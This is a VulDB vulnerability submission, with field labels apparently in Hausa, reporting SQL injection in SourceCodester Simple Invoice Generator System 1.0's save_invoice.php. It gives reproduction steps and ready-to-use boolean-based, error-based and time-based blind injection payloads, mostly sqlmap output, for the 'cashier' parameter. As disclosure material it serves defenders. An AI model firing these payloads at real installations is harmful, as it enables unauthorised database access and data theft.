Súbít #403629: SourceCodester Simple Invoice Generator System 1.0 SQL Injectionbayani

Kura	SourceCodester Simple Invoice Generator System 1.0 SQL Injection
Gaskiya	I would like to report a SQL injection vulnerability I discovered in the sourcecodester of the Simple Invoice Generator System during my testing. Details: Affected URL/Endpoint: /php-invoice/save_invoice.php Vulnerable Parameter: 'invoice_code', 'customer', 'cashier', 'total_amount', 'discount_percentage', 'discount_amount', 'tendered_amount' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as any cashier. 2) Fill up the form and "Add Item". 3) Cilck "Save & Generate Printable Invoice" 2) Use a proxy like burpsuite to intercept the "save_invoice" request. 3) Input the payload to invoke the SQL injection. --- cashier=Cashier+1%27+OR+GTID_SUBSET%28CONCAT%280x717a716a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x7162786a71%29%2C8744%29--+BhDR&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty%5B%5D=1&item%5B%5D=test&unit%5B%5D=pcs&price%5B%5D=12&total%5B%5D=12&discount_percentage=0&tendered_amount=0 --- 4) It is also vulnerable to the following attackes after running sqlmap on it. --- Parameter: cashier (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: cashier=Cashier 1' AND EXTRACTVALUE(9612,CASE WHEN (9612=9612) THEN 9612 ELSE 0x3A END)-- rTeI&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 Type: error-based Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) Payload: cashier=Cashier 1' OR GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(6679=6679,1))),0x7162786a71),6679)-- laEK&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: cashier=Cashier 1' OR (SELECT 7314 FROM (SELECT(SLEEP(5)))EMDB)-- ndpB&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 --- Please let me know if you need further information or a more detailed analysis.
Màdùmga	Delvy (UID 74555)
Furta	09/06/2024 10:49 (1 Shettima 전)
Gargajiya	09/06/2024 23:32 (13 hours later)
Halitta	Shingilam
VulDB gite	276780 [SourceCodester Simple Invoice Generator System 1.0 /save_invoice.php SQL Injection]
Nganji	17

◂ Gurɗo Gumti Gada ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!